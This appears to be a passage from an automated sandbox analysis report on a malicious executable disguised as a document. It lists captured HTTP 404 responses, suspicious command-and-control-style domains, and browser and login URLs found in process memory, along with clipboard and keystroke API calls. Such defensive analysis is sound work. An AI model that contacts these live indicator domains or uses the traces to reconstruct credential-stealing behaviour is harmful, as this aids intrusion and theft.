            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 11 Sep 2024 09:20:37 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 11 Sep 2024 09:20:40 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 11 Sep 2024 09:20:45 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 11 Sep 2024 09:20:59 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 11 Sep 2024 09:21:01 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 11 Sep 2024 09:21:05 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 11 Sep 2024 09:21:07 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:21:10 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 34 61 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /a4ar/ was not found on this server.</p></body></html>
            Source: NZuQxWwOkTbZ.exe, 00000005.00000002.4147103044.0000000004D2F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kfowks.site
            Source: NZuQxWwOkTbZ.exe, 00000005.00000002.4147103044.0000000004D2F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kfowks.site/c0yj/
            Source: mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: mstsc.exe, 00000003.00000002.4145420454.000000000557C000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4144761635.00000000032CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: mstsc.exe, 00000003.00000002.4143406843.000000000284B000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.4143406843.0000000002842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: mstsc.exe, 00000003.00000002.4143406843.0000000002852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: mstsc.exe, 00000003.00000002.4143406843.0000000002842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: mstsc.exe, 00000003.00000002.4143406843.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: mstsc.exe, 00000003.00000002.4143406843.000000000284B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: mstsc.exe, 00000003.00000002.4143406843.000000000282B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: mstsc.exe, 00000003.00000003.1963406635.00000000076F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: mstsc.exe, 00000003.00000002.4145420454.0000000005D56000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4144761635.0000000003AA6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2F3lu7%2F%3FpP_8%3DnzWo
            Source: mstsc.exe, 00000003.00000002.4145420454.00000000050C6000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.4148237192.00000000073C0000.00000004.00000800.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4144761635.0000000002E16000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=ultraleap.net
            Source: mstsc.exe, 00000003.00000002.4145420454.000000000570E000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4144761635.000000000345E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.63582.photo/5o7d/?pP_8=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3Q
            Source: mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: mstsc.exe, 00000003.00000002.4145420454.00000000050C6000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.4148237192.00000000073C0000.00000004.00000800.00020000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4144761635.0000000002E16000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
            Source: mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: mstsc.exe, 00000003.00000002.4145420454.000000000607A000.00000004.10000000.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000002.4144761635.0000000003DCA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.rtpngk.xyz/altr/?pP_8=VbdX0kog8qSHBufLtK
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00767099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00767099
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00767294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00767294
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00767099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00767099
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exeCode function: 0_2_00754342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00754342
